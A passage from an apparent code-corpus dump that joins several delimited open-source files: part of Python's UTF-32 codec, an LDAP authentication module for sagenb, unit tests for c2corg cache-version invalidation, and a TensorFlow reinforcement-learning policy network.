raise UnicodeError("UTF-32 stream does not start with BOM")
return (output, consumed)
return self.decoder(input, self.errors, final)
def reset(self):
codecs.BufferedIncrementalDecoder.reset(self)
self.decoder = None
def getstate(self):
        # additional state info from the base class must be None here,
# as it isn't passed along to the caller
state = codecs.BufferedIncrementalDecoder.getstate(self)[0]
# additional state info we pass to the caller:
# 0: stream is in natural order for this platform
# 1: stream is in unnatural order
# 2: endianness hasn't been determined yet
if self.decoder is None:
return (state, 2)
addstate = int((sys.byteorder == "big") !=
(self.decoder is codecs.utf_32_be_decode))
return (state, addstate)
def setstate(self, state):
# state[1] will be ignored by BufferedIncrementalDecoder.setstate()
codecs.BufferedIncrementalDecoder.setstate(self, state)
state = state[1]
if state == 0:
self.decoder = (codecs.utf_32_be_decode
if sys.byteorder == "big"
else codecs.utf_32_le_decode)
elif state == 1:
self.decoder = (codecs.utf_32_le_decode
if sys.byteorder == "big"
else codecs.utf_32_be_decode)
else:
self.decoder = None
class StreamWriter(codecs.StreamWriter):
def __init__(self, stream, errors='strict'):
self.bom_written = False
codecs.StreamWriter.__init__(self, stream, errors)
def encode(self, input, errors='strict'):
self.bom_written = True
result = codecs.utf_32_encode(input, errors)
if sys.byteorder == 'little':
self.encode = codecs.utf_32_le_encode
else:
self.encode = codecs.utf_32_be_encode
return result
class StreamReader(codecs.StreamReader):
def reset(self):
codecs.StreamReader.reset(self)
try:
del self.decode
except AttributeError:
pass
def decode(self, input, errors='strict'):
(object, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, False)
if byteorder == -1:
self.decode = codecs.utf_32_le_decode
elif byteorder == 1:
self.decode = codecs.utf_32_be_decode
elif consumed>=4:
raise UnicodeError,"UTF-32 stream does not start with BOM"
return (object, consumed)
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-32',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| mpl-2.0 | 694,609,488,705,437,200 | 33.402778 | 75 | 0.572774 | false |
rmartinjak/sagenb | sagenb/notebook/auth.py | 6 | 4496 | class AuthMethod():
"""
Abstract class for authmethods that are used by ExtAuthUserManager
All auth methods must implement the following methods
"""
def __init__(self, conf):
self._conf = conf
def check_user(self, username):
raise NotImplementedError
def check_password(self, username, password):
raise NotImplementedError
def get_attrib(self, username, attrib):
raise NotImplementedError
class LdapAuth(AuthMethod):
"""
Authentication via LDAP
User authentication basically works like this:
1.1) bind to LDAP with either
- generic configured DN and password (simple bind)
- GSSAPI (e.g. Kerberos)
1.2) find the ldap object matching username.
2) if 1 succeeds, try simple bind with the supplied user DN and password
"""
def _require_ldap(default_return):
"""
function decorator to
- disable LDAP auth
- return a "default" value (decorator argument)
if importing ldap fails
"""
def wrap(f):
def wrapped_f(self, *args, **kwargs):
try:
from ldap import __version__ as ldap_version
except ImportError:
print "cannot 'import ldap', disabling LDAP auth"
self._conf['auth_ldap'] = False
return default_return
else:
return f(self, *args, **kwargs)
return wrapped_f
return wrap
def __init__(self, conf):
AuthMethod.__init__(self, conf)
def _ldap_search(self, query, attrlist=None, sizelimit=20):
"""
runs any ldap query passed as arg
"""
import ldap
from ldap.sasl import gssapi
conn = ldap.initialize(self._conf['ldap_uri'])
try:
if self._conf['ldap_gssapi']:
token = gssapi()
conn.sasl_interactive_bind_s('', token)
else:
conn.simple_bind_s(
self._conf['ldap_binddn'], self._conf['ldap_bindpw'])
result = conn.search_ext_s(
self._conf['ldap_basedn'],
ldap.SCOPE_SUBTREE,
filterstr=query,
attrlist=attrlist,
timeout=self._conf['ldap_timeout'],
sizelimit=sizelimit)
except ldap.LDAPError, e:
print 'LDAP Error: %s' % str(e)
return []
finally:
conn.unbind_s()
return result
def _get_ldapuser(self, username, attrlist=None):
"""
Returns a tuple containing the DN and a dict of attributes of the given
username, or (None, None) if the username is not found
"""
from ldap.filter import filter_format
query = filter_format(
'(%s=%s)', (self._conf['ldap_username_attrib'], username))
result = self._ldap_search(query, attrlist)
# only allow one unique result
# (len(result) will probably always be 0 or 1)
return result[0] if len(result) == 1 else (None, None)
@_require_ldap(False)
def check_user(self, username):
# LDAP is NOT case sensitive while sage is, so only allow lowercase
if not username.islower():
return False
dn, attribs = self._get_ldapuser(username)
return dn is not None
@_require_ldap(False)
def check_password(self, username, password):
import ldap
dn, attribs = self._get_ldapuser(username)
if not dn:
return False
# try to bind with found DN
conn = ldap.initialize(uri=self._conf['ldap_uri'])
try:
conn.simple_bind_s(dn, password)
return True
except ldap.INVALID_CREDENTIALS:
return False
except ldap.LDAPError, e:
print 'LDAP Error: %s' % str(e)
return False
finally:
conn.unbind_s()
@_require_ldap('')
def get_attrib(self, username, attrib):
# 'translate' attribute names used in ExtAuthUserManager
# to their ldap equivalents
# "email" is "mail"
if attrib == 'email':
attrib = 'mail'
dn, attribs = self._get_ldapuser(username, [attrib])
if not attribs:
return ''
# return the first item or '' if the attribute is missing
return attribs.get(attrib, [''])[0]
| gpl-2.0 | -6,063,709,309,822,882,000 | 29.794521 | 79 | 0.554048 | false |
c2corg/v6_api | c2corg_api/tests/models/test_cache_version.py | 1 | 17818 | import datetime
from c2corg_api.models.area import Area
from c2corg_api.models.area_association import AreaAssociation
from c2corg_api.models.association import Association
from c2corg_api.models.cache_version import CacheVersion, \
update_cache_version, update_cache_version_associations, \
update_cache_version_for_area, update_cache_version_for_map
from c2corg_api.models.outing import Outing, OUTING_TYPE
from c2corg_api.models.route import Route, ROUTE_TYPE
from c2corg_api.models.topo_map import TopoMap
from c2corg_api.models.topo_map_association import TopoMapAssociation
from c2corg_api.models.user import User
from c2corg_api.models.user_profile import UserProfile
from c2corg_api.models.waypoint import Waypoint, WAYPOINT_TYPE, WaypointLocale
from c2corg_api.tests import BaseTestCase
from c2corg_api.views.document import DocumentRest
class TestCacheVersion(BaseTestCase):
def setUp(self): # noqa
BaseTestCase.setUp(self)
def test_trigger_create_cache_version(self):
waypoint = Waypoint(waypoint_type='summit')
self.session.add(waypoint)
self.session.flush()
cache_version = self.session.query(CacheVersion).get(
waypoint.document_id)
self.assertIsNotNone(cache_version)
self.assertIsNotNone(cache_version.version)
self.assertIsNotNone(cache_version.last_updated)
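    # Editor's sketch (not used by the original tests): the tests below fetch
    # CacheVersion rows repeatedly via self.session.query(...).get(...); a
    # helper like this one expresses that lookup in a single place.
    def _cache_version_of(self, document_id):
        return self.session.query(CacheVersion).get(document_id)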
def test_update_cache_version_single_wp(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all([waypoint, waypoint_unrelated])
self.session.flush()
cache_version = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version.last_updated = datetime.datetime(2016, 1, 1, 12, 1, 0)
self.session.flush()
current_version = cache_version.version
current_last_updated = cache_version.last_updated
update_cache_version(waypoint)
self.session.refresh(cache_version)
self.assertEqual(cache_version.version, current_version + 1)
self.assertNotEqual(cache_version.last_updated, current_last_updated)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_wp_with_associations(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated])
self.session.flush()
self.session.add(Association.create(waypoint1, waypoint2))
self.session.add(Association.create(waypoint3, waypoint1))
self.session.flush()
update_cache_version(waypoint1)
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
        cache_version2 = self.session.query(CacheVersion).get(
            waypoint2.document_id)
        cache_version3 = self.session.query(CacheVersion).get(
            waypoint3.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_wp_as_main_wp(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(main_waypoint=waypoint1, activities=['skitouring'])
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated, route])
self.session.flush()
self.session.add(Association.create(waypoint1, route))
self.session.add(Association.create(waypoint2, route))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version(waypoint1)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_wp3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_wp1.version, 3)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_wp3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_route(self):
route1 = Route(activities=['skitouring'])
route2 = Route(activities=['skitouring'])
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint_unrelated, route1, route2])
self.session.flush()
self.session.add(Association.create(waypoint1, route1))
self.session.add(Association.create(route2, route1))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.flush()
update_cache_version(route1)
cache_version_route1 = self.session.query(CacheVersion).get(
route1.document_id)
cache_version_route2 = self.session.query(CacheVersion).get(
route2.document_id)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_route1.version, 2)
self.assertEqual(cache_version_route2.version, 2)
self.assertEqual(cache_version_wp1.version, 3)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_outing(self):
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
route1 = Route(activities=['skitouring'])
route2 = Route(activities=['skitouring'])
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[outing, waypoint1, waypoint2, waypoint_unrelated, route1, route2])
self.session.flush()
self.session.add(Association.create(route1, outing))
self.session.add(Association.create(waypoint1, route1))
self.session.add(Association.create(route2, outing))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.flush()
update_cache_version(outing)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
cache_version_route1 = self.session.query(CacheVersion).get(
route1.document_id)
cache_version_route2 = self.session.query(CacheVersion).get(
route2.document_id)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_route1.version, 2)
self.assertEqual(cache_version_route2.version, 2)
self.assertEqual(cache_version_wp1.version, 2)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_user(self):
""" Test that outings are invalidated if an user name changes.
"""
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
user_profile = UserProfile()
self.session.add_all([outing, user_profile])
self.session.flush()
self.session.add(Association.create(user_profile, outing))
self.session.flush()
update_cache_version(user_profile)
cache_version_user_profile = self.session.query(CacheVersion).get(
user_profile.document_id)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_user_profile.version, 2)
def test_update_cache_version_user_document_version(self):
""" Test that a document is invalidated if a user name of a user that
edited one of the document versions is changed.
"""
waypoint = Waypoint(
waypoint_type='summit', elevation=2203, locales=[
WaypointLocale(lang='en', title='...', description='...')])
user_profile = UserProfile()
user = User(
name='test_user',
username='test_user', email='[email protected]',
forum_username='testuser', password='test_user',
email_validated=True, profile=user_profile)
self.session.add_all([waypoint, user_profile, user])
self.session.flush()
DocumentRest.create_new_version(waypoint, user.id)
update_cache_version(user_profile)
cache_version_user_profile = self.session.query(CacheVersion).get(
user_profile.document_id)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_user_profile.version, 2)
def test_update_cache_version_associations_removed_wp(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated])
self.session.flush()
update_cache_version_associations([], [
{'parent_id': waypoint1.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': waypoint2.document_id, 'child_type': WAYPOINT_TYPE},
{'parent_id': waypoint3.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': waypoint1.document_id, 'child_type': WAYPOINT_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_associations_removed_wp_route(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(activities=['skitouring'])
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated, route])
self.session.flush()
self.session.add(Association.create(waypoint2, waypoint1))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version_associations([], [
{'parent_id': waypoint1.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': route.document_id, 'child_type': ROUTE_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_associations_removed_route_outing(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(activities=['skitouring'])
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated,
route, outing])
self.session.flush()
self.session.add(Association.create(waypoint1, route))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version_associations([], [
{'parent_id': route.document_id, 'parent_type': ROUTE_TYPE,
'child_id': outing.document_id, 'child_type': OUTING_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_for_area(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
area = Area()
self.session.add_all([waypoint, waypoint_unrelated, area])
self.session.flush()
self.session.add(AreaAssociation(
document_id=waypoint.document_id, area_id=area.document_id))
self.session.flush()
update_cache_version_for_area(area)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
cache_version_area = self.session.query(CacheVersion).get(
area.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
# the cache key of the area is also not updated!
self.assertEqual(cache_version_area.version, 1)
def test_update_cache_version_for_map(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
topo_map = TopoMap()
self.session.add_all([waypoint, waypoint_unrelated, topo_map])
self.session.flush()
self.session.add(TopoMapAssociation(
document_id=waypoint.document_id,
topo_map_id=topo_map.document_id))
self.session.flush()
update_cache_version_for_map(topo_map)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
cache_version_map = self.session.query(CacheVersion).get(
topo_map.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
# the cache key of the map is also not updated!
self.assertEqual(cache_version_map.version, 1)
| agpl-3.0 | -5,723,569,617,226,166,000 | 42.995062 | 79 | 0.66343 | false |
xcyan/models | pcl_rl/policy.py | 13 | 16946 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Policy neural network.
Implements network which takes in input and produces actions
and log probabilities given a sampling distribution parameterization.
"""
import tensorflow as tf
import numpy as np
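# --- Editor's sketch (illustration only, not used by the classes below) -----
# For continuous (Box) actions the network emits sampling_dim = 2 * act_dim
# values per step: the first half are means, the second half standard
# deviations of a diagonal Gaussian.  This NumPy helper mirrors how
# Policy.sample_action and Policy.log_prob_action read such a vector.
def _gaussian_sample_and_log_prob(logits, rng=np.random):
  act_dim = logits.shape[-1] // 2
  means, std = logits[..., :act_dim], logits[..., act_dim:]
  act = means + std * rng.standard_normal(means.shape)
  log_prob = np.sum(-0.5 * np.log(2 * np.pi * std ** 2)
                    - 0.5 * (act - means) ** 2 / std ** 2, axis=-1)
  return act, log_prob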
class Policy(object):
def __init__(self, env_spec, internal_dim,
fixed_std=True, recurrent=True,
input_prev_actions=True):
self.env_spec = env_spec
self.internal_dim = internal_dim
self.rnn_state_dim = self.internal_dim
self.fixed_std = fixed_std
self.recurrent = recurrent
self.input_prev_actions = input_prev_actions
self.matrix_init = tf.truncated_normal_initializer(stddev=0.01)
self.vector_init = tf.constant_initializer(0.0)
@property
def input_dim(self):
return (self.env_spec.total_obs_dim +
self.env_spec.total_sampled_act_dim * self.input_prev_actions)
@property
def output_dim(self):
return self.env_spec.total_sampling_act_dim
def get_cell(self):
"""Get RNN cell."""
self.cell_input_dim = self.internal_dim // 2
cell = tf.contrib.rnn.LSTMCell(self.cell_input_dim,
state_is_tuple=False,
reuse=tf.get_variable_scope().reuse)
cell = tf.contrib.rnn.OutputProjectionWrapper(
cell, self.output_dim,
reuse=tf.get_variable_scope().reuse)
return cell
def core(self, obs, prev_internal_state, prev_actions):
"""Core neural network taking in inputs and outputting sampling
distribution parameters."""
batch_size = tf.shape(obs[0])[0]
if not self.recurrent:
prev_internal_state = tf.zeros([batch_size, self.rnn_state_dim])
cell = self.get_cell()
b = tf.get_variable('input_bias', [self.cell_input_dim],
initializer=self.vector_init)
cell_input = tf.nn.bias_add(tf.zeros([batch_size, self.cell_input_dim]), b)
for i, (obs_dim, obs_type) in enumerate(self.env_spec.obs_dims_and_types):
w = tf.get_variable('w_state%d' % i, [obs_dim, self.cell_input_dim],
initializer=self.matrix_init)
if self.env_spec.is_discrete(obs_type):
cell_input += tf.matmul(tf.one_hot(obs[i], obs_dim), w)
elif self.env_spec.is_box(obs_type):
cell_input += tf.matmul(obs[i], w)
else:
assert False
if self.input_prev_actions:
if self.env_spec.combine_actions: # TODO(ofir): clean this up
prev_action = prev_actions[0]
for i, action_dim in enumerate(self.env_spec.orig_act_dims):
act = tf.mod(prev_action, action_dim)
w = tf.get_variable('w_prev_action%d' % i, [action_dim, self.cell_input_dim],
initializer=self.matrix_init)
cell_input += tf.matmul(tf.one_hot(act, action_dim), w)
prev_action = tf.to_int32(prev_action / action_dim)
else:
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
w = tf.get_variable('w_prev_action%d' % i, [act_dim, self.cell_input_dim],
initializer=self.matrix_init)
if self.env_spec.is_discrete(act_type):
cell_input += tf.matmul(tf.one_hot(prev_actions[i], act_dim), w)
elif self.env_spec.is_box(act_type):
cell_input += tf.matmul(prev_actions[i], w)
else:
assert False
output, next_state = cell(cell_input, prev_internal_state)
return output, next_state
def sample_action(self, logits, sampling_dim,
act_dim, act_type, greedy=False):
"""Sample an action from a distribution."""
if self.env_spec.is_discrete(act_type):
if greedy:
act = tf.argmax(logits, 1)
else:
act = tf.reshape(tf.multinomial(logits, 1), [-1])
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
if greedy:
act = means
else:
batch_size = tf.shape(logits)[0]
act = means + std * tf.random_normal([batch_size, act_dim])
else:
assert False
return act
def entropy(self, logits,
sampling_dim, act_dim, act_type):
"""Calculate entropy of distribution."""
if self.env_spec.is_discrete(act_type):
entropy = tf.reduce_sum(
-tf.nn.softmax(logits) * tf.nn.log_softmax(logits), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
entropy = tf.reduce_sum(
0.5 * (1 + tf.log(2 * np.pi * tf.square(std))), -1)
else:
assert False
return entropy
def self_kl(self, logits,
sampling_dim, act_dim, act_type):
"""Calculate KL of distribution with itself.
    Used only for its gradients (its value is identically zero).
"""
if self.env_spec.is_discrete(act_type):
probs = tf.nn.softmax(logits)
log_probs = tf.nn.log_softmax(logits)
self_kl = tf.reduce_sum(
tf.stop_gradient(probs) *
(tf.stop_gradient(log_probs) - log_probs), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
my_means = tf.stop_gradient(means)
my_std = tf.stop_gradient(std)
self_kl = tf.reduce_sum(
tf.log(std / my_std) +
(tf.square(my_std) + tf.square(my_means - means)) /
(2.0 * tf.square(std)) - 0.5,
-1)
else:
assert False
return self_kl
def log_prob_action(self, action, logits,
sampling_dim, act_dim, act_type):
"""Calculate log-prob of action sampled from distribution."""
if self.env_spec.is_discrete(act_type):
act_log_prob = tf.reduce_sum(
tf.one_hot(action, act_dim) * tf.nn.log_softmax(logits), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
act_log_prob = (- 0.5 * tf.log(2 * np.pi * tf.square(std))
- 0.5 * tf.square(action - means) / tf.square(std))
act_log_prob = tf.reduce_sum(act_log_prob, -1)
else:
assert False
return act_log_prob
def sample_actions(self, output, actions=None, greedy=False):
"""Sample all actions given output of core network."""
sampled_actions = []
logits = []
log_probs = []
entropy = []
self_kl = []
start_idx = 0
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
if self.fixed_std and self.env_spec.is_box(act_type):
act_logits = output[:, start_idx:start_idx + act_dim]
log_std = tf.get_variable('std%d' % i, [1, sampling_dim // 2])
# fix standard deviations to variable
act_logits = tf.concat(
[act_logits,
1e-6 + tf.exp(log_std) + 0 * act_logits], 1)
else:
act_logits = output[:, start_idx:start_idx + sampling_dim]
if actions is None:
act = self.sample_action(act_logits, sampling_dim,
act_dim, act_type,
greedy=greedy)
else:
act = actions[i]
ent = self.entropy(act_logits, sampling_dim, act_dim, act_type)
kl = self.self_kl(act_logits, sampling_dim, act_dim, act_type)
act_log_prob = self.log_prob_action(
act, act_logits,
sampling_dim, act_dim, act_type)
sampled_actions.append(act)
logits.append(act_logits)
log_probs.append(act_log_prob)
entropy.append(ent)
self_kl.append(kl)
start_idx += sampling_dim
assert start_idx == self.env_spec.total_sampling_act_dim
return sampled_actions, logits, log_probs, entropy, self_kl
def get_kl(self, my_logits, other_logits):
"""Calculate KL between one policy output and another."""
kl = []
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
single_my_logits = my_logits[i]
single_other_logits = other_logits[i]
if self.env_spec.is_discrete(act_type):
my_probs = tf.nn.softmax(single_my_logits)
my_log_probs = tf.nn.log_softmax(single_my_logits)
other_log_probs = tf.nn.log_softmax(single_other_logits)
my_kl = tf.reduce_sum(my_probs * (my_log_probs - other_log_probs), -1)
elif self.env_spec.is_box(act_type):
my_means = single_my_logits[:, :sampling_dim / 2]
my_std = single_my_logits[:, sampling_dim / 2:]
other_means = single_other_logits[:, :sampling_dim / 2]
other_std = single_other_logits[:, sampling_dim / 2:]
my_kl = tf.reduce_sum(
tf.log(other_std / my_std) +
(tf.square(my_std) + tf.square(my_means - other_means)) /
(2.0 * tf.square(other_std)) - 0.5,
-1)
else:
assert False
kl.append(my_kl)
return kl
def single_step(self, prev, cur, greedy=False):
"""Single RNN step. Equivalently, single-time-step sampled actions."""
prev_internal_state, prev_actions, _, _, _, _ = prev
obs, actions = cur # state observed and action taken at this time step
# feed into RNN cell
output, next_state = self.core(
obs, prev_internal_state, prev_actions)
# sample actions with values and log-probs
(actions, logits, log_probs,
entropy, self_kl) = self.sample_actions(
output, actions=actions, greedy=greedy)
return (next_state, tuple(actions), tuple(logits), tuple(log_probs),
tuple(entropy), tuple(self_kl))
def sample_step(self, obs, prev_internal_state, prev_actions, greedy=False):
"""Sample single step from policy."""
(next_state, sampled_actions, logits, log_probs,
entropies, self_kls) = self.single_step(
(prev_internal_state, prev_actions, None, None, None, None),
(obs, None), greedy=greedy)
return next_state, sampled_actions
def multi_step(self, all_obs, initial_state, all_actions):
"""Calculate log-probs and other calculations on batch of episodes."""
batch_size = tf.shape(initial_state)[0]
time_length = tf.shape(all_obs[0])[0]
initial_actions = [act[0] for act in all_actions]
all_actions = [tf.concat([act[1:], act[0:1]], 0)
for act in all_actions] # "final" action is dummy
(internal_states, _, logits, log_probs,
entropies, self_kls) = tf.scan(
self.single_step,
(all_obs, all_actions),
initializer=self.get_initializer(
batch_size, initial_state, initial_actions))
# remove "final" computations
log_probs = [log_prob[:-1] for log_prob in log_probs]
entropies = [entropy[:-1] for entropy in entropies]
self_kls = [self_kl[:-1] for self_kl in self_kls]
return internal_states, logits, log_probs, entropies, self_kls
def get_initializer(self, batch_size, initial_state, initial_actions):
"""Get initializer for RNN."""
logits_init = []
log_probs_init = []
for act_dim, act_type in self.env_spec.act_dims_and_types:
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
logits_init.append(tf.zeros([batch_size, sampling_dim]))
log_probs_init.append(tf.zeros([batch_size]))
entropy_init = [tf.zeros([batch_size]) for _ in self.env_spec.act_dims]
self_kl_init = [tf.zeros([batch_size]) for _ in self.env_spec.act_dims]
return (initial_state,
tuple(initial_actions),
tuple(logits_init), tuple(log_probs_init),
tuple(entropy_init),
tuple(self_kl_init))
def calculate_kl(self, my_logits, other_logits):
"""Calculate KL between one policy and another on batch of episodes."""
batch_size = tf.shape(my_logits[0])[1]
time_length = tf.shape(my_logits[0])[0]
reshaped_my_logits = [
tf.reshape(my_logit, [batch_size * time_length, -1])
for my_logit in my_logits]
reshaped_other_logits = [
tf.reshape(other_logit, [batch_size * time_length, -1])
for other_logit in other_logits]
kl = self.get_kl(reshaped_my_logits, reshaped_other_logits)
kl = [tf.reshape(kkl, [time_length, batch_size])
for kkl in kl]
return kl
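# --- Editor's sketch (illustration only) -------------------------------------
# self_kl and get_kl above both use the closed form KL between diagonal
# Gaussians, KL(p||q) = sum_i [ log(s_q/s_p) + (s_p^2 + (m_p - m_q)^2) /
# (2 s_q^2) - 1/2 ].  The same expression in NumPy, for reference:
def _gaussian_kl(means_p, std_p, means_q, std_q):
  return np.sum(np.log(std_q / std_p)
                + (std_p ** 2 + (means_p - means_q) ** 2) / (2.0 * std_q ** 2)
                - 0.5, axis=-1)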
class MLPPolicy(Policy):
"""Non-recurrent policy."""
def get_cell(self):
self.cell_input_dim = self.internal_dim
def mlp(cell_input, prev_internal_state):
w1 = tf.get_variable('w1', [self.cell_input_dim, self.internal_dim])
